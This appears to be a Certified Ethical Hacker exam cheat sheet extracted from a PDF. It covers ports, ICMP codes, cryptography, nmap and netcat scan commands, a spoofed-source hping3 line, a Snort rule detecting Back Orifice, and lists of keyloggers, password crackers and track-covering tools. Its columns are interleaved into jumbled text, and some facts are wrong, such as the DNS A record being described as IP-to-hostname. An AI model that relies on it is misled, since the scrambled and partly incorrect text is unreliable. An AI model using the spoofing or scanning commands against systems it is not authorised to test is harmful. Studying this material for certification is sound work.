Basics Single Authority: CA at top. Trust based on PSH: Forces delivery without concern for 5 phases to a penetration test CA itself buffering Reconnaissance Hierarchical: CA at top. RA’s Under to RST: Forces comms termination in both direc- Scanning & Enumeration manage certs tions Gaining Access XMKS - XML PKI System SYN: Initial comms. Parameters and se- Maintaining Access quence #’s Covering Tracks Cryptography Attacks FIN: ordered close to communications Attack Types Known Plain-text: Search plaintext for re-
OS: Attacks targeting default OS settings peatable sequences. Compare to t versions. DHCP App level: Application code attacks Ciphertext-only: Obtain several messages Client — Discover-> Server Shrink Wrap: off-the-shelf scripts and code with same algorithm. Analyze to reveal Client<—Offers—- Server Misconfiguration: not configured well repeating code. Client —Request—> Server Replay: Performed in MITM. Repeat Client<—-ACK—- Server Legal exchange to fool system in setting up a IP is removed from pool 18 U.S.C 1029 & 1030 comms channel. RFC 1918 - Private IP Standard Digital Certificate Scanning & Enumeration RFC 3227 - Collecting and storing data Used to verify user identity = nonrepudia- ICMP Message Types ISO 27002 - InfoSec Guidelines tion 0: Echo Reply: Answer to type 8 Echo Request CAN-SPAM - email marketing Version: Identifies format. Common = V1 3: Destination Unreachable: No host/ network SPY-Act - License Enforcement Serial: Uniquely identify the certificate Codes DMCA - Intellectual Property Subject: Whoever/whatever being identi- 0 ― Destination network unreachable SOX - Corporate Finance Processes fied by cert 1― Destination host unreachable GLBA - Personal Finance Data Algorithm ID: Algorithm used 6 ― Network unknown FERPA - Education Records Issuer: Entity that verifies authenticity of 7 ― Host unknown FISMA - Gov Networks Security Std certificate 9 ― Network administratively prohibited Valid from/to: Certificate good through 10 ― Host administratively prohibited CVSS - Common Vuln Scoring System dates 13 ― Communication administratively pro- CVE - Common Vulns and Exposure Key usage: Shows for what purpose cert habited was made 4: Source Quench: Congestion control mes- Regional Registry Coverage Map Subject’s public key: self-explanatory sage Optional fields: e.g., Issuer ID, Subject Alt 5: Redirect: 2+ gateways for sender to use or Name... the best route not the configured default gateway Reconnaissance Codes Definition 0 ― redirect datagram for the network Gathering information on targets, whereas 1 ― redirect datagram for the host foot-printing is mapping out at a high level. 8: Echo Request: Ping message requesting These are interchangeable in C|EH. echo Google Hacking: 11: Time Exceeded: Packet too long be routed Cryptography Operator: keyword additional search items CIDR Symmetric Encryption site: Search only within domain Method of the representing IP Addresses IPv4 Key pairs required = ext: File Extension Notation Symmetric Algorithms loc: Maps Location /30=4 .225.252 DES: 56bit key (8bit parity); fixed block intitle: keywords in title tag of page /28=16 .255.240 3DES: 168bit key; keys ≤ 3 allintitle: any keywords can be in title /26=64 .255.192 AES: 128, 192, or 256; replaced DES inurl: keywords anywhere in url /24=256 . 255.0 IDEA: 128bit key allinurl: any of the keywords can be in url /22=1024 .248.0 Twofish: Block cipher key size ≤ 256bit incache: search Google cache only /20=4096 .240.0 Blowfish: Rep. by AES; 64bit block DNS RC: incl. RC2 ―› RC6. 2,040key, RC6 (128bit port 53 nslokup (UDP), Zone xfer (TCP) block) DNS record types Asymmetric Encryption Service (SRV): hostname & port # of servers Public key = Encrypt, Private Key = Decrypt Start of Authority (SOA): Primary name Asymmetric Algorithms server Diffie-Hellman: key Exchange, used in SSL/ Pointer (PTR): IP to Hostname; for reverse IPSec DNS ECC: Elliptical Curve. Low process power/ Name Server (NS): NameServers with Mobile namespace EI Gamal: !=Primes, log problem to encrypt/ Mail Exchange (MX): E-mail servers Port Numbers sign CNAME: Aliases in zone. list multi services 0 — 1023: Well-known RSA: 2 x Prime 4,096bit. Modern std. in DNS 1024 — 49151: Registered Hash Algorithms Address (A): IP to Hostname; for DNS 49152 — 65535: Dynamic MD5: 128bit hash, expres as 32bit hex lookup Important Port Numbers SHA1: 160bit hash,rq 4 use in US apps DNS footprinting: whois, nslookup, dig FTP: 20/21 SHA2: 4 sep hash 224,256,384,512 SSH: 22 Trust Models TCP Header Flags Telnet: 23 Web of trust: Entities sign certs for each URG: Indicates data being sent out of band SMTP: 25 other ACK: Ack to, and after SYN WINS: 42 Remove Watermark Wondershare PDFelement TACACS: 49 nbtstat -r -purge name cache file. Cracking efforts on a separate system DNS: 53 nbtstat -S 10 -display ses stats every 10 sec Non-electronic: Social Engineering HTTP: 80 / 8080 1B ==master browser for the subnet Sidejacking Kerbers: 88 1C == domain controller Steal cookies exchanged between systems POP3: 110 1D == domain master browser and use tp perform a replay-style attack. Portmapper (Linux): 111 Authentication Types NNTP: 119 SNMP Type 1: Something you know NTP: 123 Uses a community string for PW Type 2: Something you have RPC-DCOM: 135 SNMPv3 encrypts the community strings Type 3: Something you are NetBIOS/SMB: 137-139 Session Hijacking IMAP: 143 Sniffing and Evasion Refers to the active attempt to steal an entire SNMP: 161/162 IPv4 and IPv6 established session from a target LDAP: 389 IPv4 == unicast, multicast, and broadcast 1. Sniff traffic between client and server HTTPS: 443 IPv6 == unicast, multicast, and anycast. 2. Monitor traffic and predict sequence CIFS: 445 IPv6 unicast and multicast scope includes 3. Desynchronise session with client RADIUS: 1812 link local, site local and global. 4. Predict session token and take over session RDP: 3389 5. Inject packets to the target server IRC: 6667 MAC Address Kerberos Printer: 515,631,9100 First half = 3 bytes (24bits) = Org UID Kerberos makes use of symmetric and asym- Second half = unique number metric encryption technologies and involves: Tini: 7777 KDC: Key Distribution Centre NetBus: 12345 NAT (Network Address Translation) AS: Authentication Service Back Orifice: 27374 Basic NAT is a one-to-one mapping where TGS: Ticket Granting Service Sub7: 31337 each internal IP== a unique public IP. TGT: Ticket Granting Ticket Nat overload (PAT) == port address trans- Process HTTP Error Codes lation. Typically used as is the cheaper 1. Client asks KDC (who has AS and TGS) for 200 Series - OK option. ticket to authenticate throughout the net- 400 Series - Could not provide req work. this request is in clear text. 500 Series - Could not process req Stateful Inspection 2. Server responds with secret key. hashed by Concerned with the connections. Doesn’t the password copy kept on AD server (TGT). Nmap sniff ever packet, it just verifies if it’s a 3. TGT sent back to server requesting TGS if Nmap is the de-facto tool for this pen- known connection, then passes along. user decrypts. test phase 4. Server responds with ticket, and client can Nmap <scan options> <target> HTTP Tunnelling log on and access network resources. -sA: ACK scan -sF: FIN scan Crafting of wrapped segments through a SAM file -sS:SYN -sT: TCP scan port rarely filtered by the Firewall (e.g., 80) C:\Windows\system32\config -sI: IDLS scan -sn: PING sweep to carry payloads that may otherwise be -sN: NULL -sS: Stealth Scan blocked. Registry -sR: RPC scan -Po: No ping 2 elements make a registry setting: a key -sW: Window -sX: XMAS tree scan Snort IDS (location pointer), and valu (define the key -PI: ICMP ping - PS: SYN ping It has 3 modes: setting). -PT: TCP ping -oN: Normal output Sniffer/Packet logger/ Network IDS. Rot level keys are as follows: -oX: XML output -A OS/Vers/Script Config file: /etc/snort, or c:\snort\etc HKEY_LOCAL_MACHINE_Info on Hard/soft- -T<0-4>: Slow - Fast #~alert tcp!HOME_NET any ->$HOME_ ware Scan Types NET 31337 (msg : “BACKDOOR AT- HKEY_CLASSES_ROOT ― Info on file associ- TCP: 3 way handshake on all ports. TEMPT-Back-orifice.”) ations and Object Linking and Embedding Open = SYN/ACK, Closed = RST/ACK Any packet from any address !=home net- (OLE) classes SYN: SYN packets to ports (incomplete hand- work. Using any source port, intended for HKEY_CURRENT_USER ― Profile info on shake). an address in home network on port 31337, current user Open = SYN/ ACK, Closed = RST/ ACK send msg. HKEY_USERS ― User config info for all active FIN: Packet with FIN flag set Span port: port mirroring users Open = no response, Closed = RST False Negative: IDS incorrectly reports HEKY_CURRENT-CONFIG―pointer to\hard- XMAS: Multiple flags set (fin, URG, and PSH) stream clean ware Profiles\. Binary Header: 00101001 IDS Evasion Tactics HEKY_LOCAL-MACHINE\Software\Micro- Open = no response, Closed = RST Slow down OR flood the network (and soft\Windows\CurrentVersion ACK: Used for Linux/Unix systems sneak through in the mix) OR fragmentation \RunServicesOnce Open = RST, Closed = no response TCPdump syntax \RunServices IDLE: Spoofed IP, SYN flag, designed for #~tcpdump flag(s) interface \Run Once stealth. \Run Open = SYN/ACK, Closed= RST/ACK Social Engineering Attacking a System C|EH rules for passwords Human based attacks NULL: No flags set. Responses vary by OS. Dumpster diving Must not contain user’s name. Min 8 chars. 3 NULL scans are designed for Linux/ Unix Impersonation of 4 complexity components. E.g., Special, machines. Technical Support Number, Uppercase, Lowercase LM Hashing Should Surfing NetBIOS Tailgating/ Piggybacking 7 spaces hashed: AAD3B435B51404EE nbstat Attack types nbtstat -a COMPUTER 190 Computer based attacks Passive Online: Sniffing wire, intercept nbtstat -A 192.168.10.12 remote table Phishing - Email SCAM cleartext password / replay / MITM nbtstat -n local name table Whaling - Targeting CEO’s Active Online: Password guessing. Offline: nbtstat -c local name cache Pharming - Evil Twin Website Steal copy of password i.e., SAM Remove Watermark Wondershare PDFelement Spec Dist Speed Freq net and software client fallback to SSL 3.0. Types of Social Engineers 802.11a 30m 54 Mbps 5GHz Shellshock: CVE-2014-6271 Insider Associates: Limited Authorized 802.11b 100m 11 Mbps 2.4 GHz Exploit a vuln that executes codes inside the ‘ Access 802.11g 100m 54 Mbps 2.4 GHz ’ where the text should not be exe. Insider Affiliates: Insiders by virtue of Affilia- 802.11n 125m 100 Mbps+ 2.4/5GHz ILOVEYOU: A worm originating in the Philip- tion that spoof the identity of the Insider pines. Started in May 5, 2000, and was built Outsider Affiliates: Non-trusted outsider that Bluetooth Attacks on a VBS macro in Microsoft word/excel/ use an access point that was left open Bluesmacking: DoS against a device templates. Bluejacking: Sending messages to/from MELISSA: Email virus based on MS word mac- Physical Security devices ro. Created in 1999 by David L. Smith. 3 major categories of Physical Security Bluesniffing: Sniffs for Bluetooth measures Bluesnarfing: actual theft of data from a Linux Commands Physical measures: Things you taste, touch, device Linux File System smell / -Root Technical measures: smart cards, biometrics Trojans and Other Attacks /var -Variable Data / Log Files Operational measures: policies and proce- Virus Types /bin -Biniaries / User Commands dures Boot: Moves boot sector to another loca- /sbin -Sys Binaries / Admin Commands tion. Almost impossible to remove. /root -Home dir for root user Web-based Hacking Camo: Disguise as legit files. /boot -Store kernel CSRF - Cross Site Request Forgery Cavity: Hides in empty areas in exe. Marco: /proc -Direct access to kernel Dot-dot-slash Attack Written in MS Office Macro Language /dev -Hardware storage devices Variant of Unicode or un-validated input Multipartite: Attempts to infect files and /mnt -Mount devices attack boot sector at same time. Identifying Users and Processes SQL Injection attack types Metamorphic virus: Rewrites itself when it INIT process ID 1 Union Query: Use the UNION command to infects a new file. Root UID, GID 0 return the union of target Db with a crafted Network: Spreads via network shares. Accounts of Services 1-999 Db Polymorphic Code virus: Encrypts itself All other users Above 1000 Tautology: Term used to describe behavior using built-in polymorphic engine. Permissions of a Db when deciding if a statement is true. Constantly changing signature makes it 4 - Read Blind SQL Injection: Trial and Error with no hard to detect. 2 - Write responses or prompts. Shell virus: Like boot sector but wrapped 1 - Execute Error based SQL Injection: Enumeration around application code, and run on appli- User/Group/Others technique. Inject poorly constructed com- cation start. 764 - User>RWX, Grp>RW, Other>R mands to have Db respond with table names Stealth: Hides in files, copies itself to deliv- Snort and other information er payload. action protocol address port -> address port DOS Types (option:value;option:value) Buffer Overflow SYN Attack: Send thousands of SYN packets alert tcp 10.0.0.1 25 -> 10.0.0.2 25 A condition that occurs when more data is with a false IP address. Target will attempt (msg:”Sample Alert”; sid:1000;) written to a buffer than it has space to store SYN/ACK response. All machine resources and results in data corruption. Caused by will be engaged. Command Line Tools insufficient bounds checking, a bug, or poor SYN Flood: Send thousands of SYN Packets NMap configuration in the program code. but never respond to any of the returned nmap -sT -T5 -n -p 1-100 10.0.0.1 Stack: Premise is all program calls are kept in SYN/ACK packets. Target will run out of Netcat a stack and performed in order.Try to change available connections. nc -v -z -w 2 10.0.0.1 a function pointer or variable to allow code ICMP Flood: Send ICMP Echo packets with TCPdump exe a fake source address. Target attempts to tcpdump -i eth0 -v -X ip proto 1 Heap: Takes advantage of memory “on top respond but reaches a limit of packets sent Snort of” the application (dynamically allocated). per second. snort -vde -c my.rules 1 Use program to overwrite function pointers Application level: Send “legitimate” traffic hping NOP Sled: Takes advantage of instruction to a web application than it can handle. hping3 -I -eth0 -c 10 -a 2.2.2.2 -t 100 10.0.0.1 called “no-op”. Sends a large # of NOP in- Smurf: Send large number of pings to iptables structions into buffer. Most IDS protect from the broadcast address of the subnet with iptables -A FORWARD -j ACCEPT -p tcp ―dport this attack. source IP spoofed to target. Subnet will 80 Dangerous SQL functions send ping responses to target. Tools of the Trade The following do not check size of destination Fraggle Attack: Similar to Smurf but uses Vulnerability Research buffers: UDP. National Vuln Db gets() strcpy() stract() printf() Ping of Death: Attacker fragments ICMP Eccouncil.org message to send to target. When the frag- Exploit -db ments are reassembled, the resultant ICMP Wireless Network Hacking Foot-printing packet is larger than max size and crashes Wireless sniffing Website Research Tools the system Compatible wireless adapter with promiscu- Netcraft ous mode is required, but otherwise pretty Webmaster Viruses much the same as sniffing wired. Archive Heartbleed: CVE-2014-0160 802.11 Specifications DNS and Whois Tools Founded by Neel Mehta, Heartbleed is a WEP: RC4 with 24bit vector. Kers are 40 or Nslookup vulnerability with heartbeat in OpenSSL 104bit Sam Spacde software Library. Allowed for MITM to steal WAP: RC4 supports longer keys; 48bit IV ARIN information protected under normal condi- WPA/TKIP: Changes IV each frame and key WhereisIP tions by SSL/TLS encryption. mixing DNSstuff POODLE: CVE-2014-3566 WPA2: AES + TKIP features; 48bit IV DNS-Digger MITM exploit which took advantage of inter- Remove Watermark Wondershare PDFelement Website Mirroring Actual Spy Wireless Wget Ghost Kismet Archive Hiddern Recorder Netstumbler GoogleCache Desktop Spy MAC Flooding/Spoofing Scanning and Enumeration USB Grabber Macof Ping Sweep Privilege Escalation SMAC Angry IP Scanner Password Recovery Boot Disk ARP Poisoning MegaPing Password Reset Cain Scanning Tools Password Recovery UfaSoft SuperScan System Recovery WinARP Attacker NMap (Zenmap) Executing Applications Wireless NetScan Tools Pro PDQ Deploy Discovery Hping RemoteExec Kismet Netcat Dameware NetStumbler War Dialing Spyware insider THC-Scan Remote Desktop Spy NetSurveyor TeleSweep Activity Monitor Packet Sniffing ToneLoc OSMomitor Cascade Pilot WarVox SSPro Omnipeek Banner Grabbing Spector Pro Comm View Telnet Covering Tracks Capsa ID Serve ELsave WEP/WPA Cracking Netcraft Cleaner Aircrack Xprobe EraserPro KisMac Vulnerability Scanning Evidence Eliminator Wireless Security Auditor Nessus Packet Craftin/Spoofing WepAttack SAINT Komodia WepCrack Retina Hping2 coWPatty Core Impact PackEth Bluetooth Nikto Packet Generator BTBrowser Network Mapping Netscan BH Bluejack NetMapper Scapy BTScanner LANState Nemesis Bluesnarfer IPSonar Session Hijacking Mobile Device Tracking Proxy, Anonymizer, and Tunneling Paros Proxy Wheres My Droid Tor Burp Suite Find My Phone ProxySwitcher Firesheep GadgetTrack ProxyChains Hamster/Ferret iHound SoftCab Ettecap Trojans and Malware HTTP Tunnel Hunt Wrappers Anonymouse Cryptography and Encryption Elite Wrap Enumeration Encryption Monitoring Tools SuperScan TureCrypt HiJackThis User2Sid/Sid2User BitLocker CurrPorts LDAP Admin DriveCrpyt Fport Xprobe Hash Tools Attack Tools Hyena MD5 Hash Netcat SNMP Enumeration Hash Calc Nemesis SolarWinds Steganography IDS SNMPUtil XPTools Snort SNMPScanner ImageHide Evasion Tools System Hacking Tools Merge Streams ADMutate Password Hacking StegParty NIDSBench Cain gifShuffle IDSInformer John the Ripper QuickStego Inundator LCP InvisibleSecrets Web Attacks THC-Hydra EZStego Wfetch ElcomSoft OmniHidePro Httprecon Aircrack Cryptanalysis ID Serve Rainbow Crack Cryptanalysis WebSleuth Brutus Cryptobench Black Widow KerbCrack Sniffing CookieDigger Sniffing Packet Capture Nstalker Wireshark Wireshark NetBrute Ace CACE SQL Injection KerbSniff tcpdump BSQL Hacker Ettercap Capsa Marathon Keyloggers and Screen Capture OmniPeek SQL Injection Brute KeyProwler Windump SQL Brute Ultimate Keylogger dnsstuff SQLNinja All in one Keylogger EtherApe SQLGET
FindmoreStationXCheatSheetshere- h t t p s : / / w w w . s t a t i o n x . n e t / c a t e g o r y / c h e a t - s h e e ts /